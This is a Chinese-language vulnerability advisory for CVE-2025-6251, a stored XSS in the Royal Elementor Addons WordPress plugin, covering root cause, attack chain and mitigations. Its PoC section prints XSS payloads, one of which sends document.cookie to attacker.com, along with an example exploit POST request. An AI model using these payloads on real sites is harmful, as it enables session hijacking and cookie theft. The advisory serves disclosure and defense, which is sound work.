CVE-2025-6251 WordPress Royal Elementor Addons存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-6251

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Royal Elementor Addons and Templates WordPress插件

漏洞概述

CVE-2025-6251是WordPress插件Royal Elementor Addons and Templates中的一个高危存储型跨站脚本(XSS)漏洞。该漏洞存在于表单构建器模块的wpr-form-builder.php文件中，由于对用户输入的$item['field_id']参数缺乏充分的输入清理和输出转义处理，导致恶意JavaScript代码可以被永久存储在数据库中。攻击者利用此漏洞需要具备Contributor级别或更高的WordPress用户权限，成功利用后可在受害者访问包含恶意代码的页面时自动执行任意Web脚本，可能导致会话劫持、敏感数据窃取、钓鱼攻击等严重后果。由于CVSS评分为6.4(中危)，且攻击复杂度低、无需用户交互，该漏洞对使用受影响版本插件的WordPress网站构成实际威胁。建议网站管理员立即升级到修复版本，并审查所有表单相关配置。

技术细节

该漏洞的根本原因在于Royal Elementor Addons插件的表单构建器功能对用户可控的字段标识符($item['field_id'])缺少适当的输入验证和输出编码。在wpr-form-builder.php文件的第4023行附近，代码直接使用未经安全处理的字段值进行输出，当该字段值被存储并在后续页面渲染时，恶意注入的HTML/JavaScript脚本将被执行。攻击者只需在表单字段配置中插入包含<script>标签或事件处理器(如onerror、onload等)的payload，即可实现存储型XSS攻击。由于WordPress的表单数据会持久化存储在数据库中，所有访问相关页面的用户都会受到攻击。此类漏洞特别危险，因为恶意脚本会在页面加载时自动执行，攻击者可以窃取cookies、会话令牌，或在用户不知情的情况下执行特权操作。修复措施需要在数据输入时进行严格的输入验证，并在所有输出点实施适当的HTML转义。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的Royal Elementor Addons插件版本，确认版本<=1.7.1036

STEP 2

步骤2: 账户获取

攻击者获取WordPress Contributor级别或更高权限的账户，可通过账户创建、凭证盗取或社会工程学手段实现

STEP 3

步骤3: 有效载荷构造

攻击者构造XSS有效载荷，如<script>alert(document.cookie)</script>或基于事件处理器的payload

STEP 4

步骤4: 漏洞注入

通过表单构建器功能，将恶意代码注入到$item['field_id']参数中并保存，payload被持久化到数据库

STEP 5

步骤5: 触发执行

当其他用户访问包含该表单的页面时，恶意脚本在受害者浏览器中自动执行

STEP 6

步骤6: 恶意活动

攻击者利用执行的JavaScript窃取会话cookies、劫持用户账户、执行未授权操作或进行进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-6251 Stored XSS PoC
// Affected: Royal Elementor Addons and Templates <= 1.7.1036
// Attack Vector: Form Builder field_id parameter

// PoC payload for field_id injection:
// <script>alert(document.cookie)</script>
// or
// <img src=x onerror=this.src='https://attacker.com/log?c='+document.cookie>

// Steps to exploit:
// 1. Login to WordPress with Contributor or higher role
// 2. Navigate to Royal Elementor Addons > Form Builder
// 3. Create or edit a form
// 4. In a field's 'field_id' parameter, inject XSS payload
// 5. Save the form
// 6. Any user visiting a page with this form will trigger the XSS

// Example HTTP POST request structure:
/*
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=wpr_save_form&nonce=XXX&
form_data=[{
  "field_id": "<script>alert('XSS')</script>",
  "field_type": "text",
  "field_label": "Test Field"
}]
*/

// The vulnerable code location (wpr-form-builder.php ~ line 4023):
// echo '<div id="' . $item['field_id'] . '">' . $content . '</div>';
// Without proper sanitization of $item['field_id']

影响范围

Royal Elementor Addons and Templates <= 1.7.1036 (所有版本至并包括1.7.1036)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：(1)如果业务允许，临时禁用Royal Elementor Addons插件的表单构建器功能；(2)限制WordPress用户的注册和角色分配，仅授予必要的最低权限；(3)启用Wordfence等安全插件的实时防护功能；(4)对所有表单相关页面实施严格的Content Security Policy(CSP)头；(5)定期检查数据库中是否存在可疑的脚本标签或事件处理器代码；(6)考虑使用额外的输入验证层过滤特殊字符。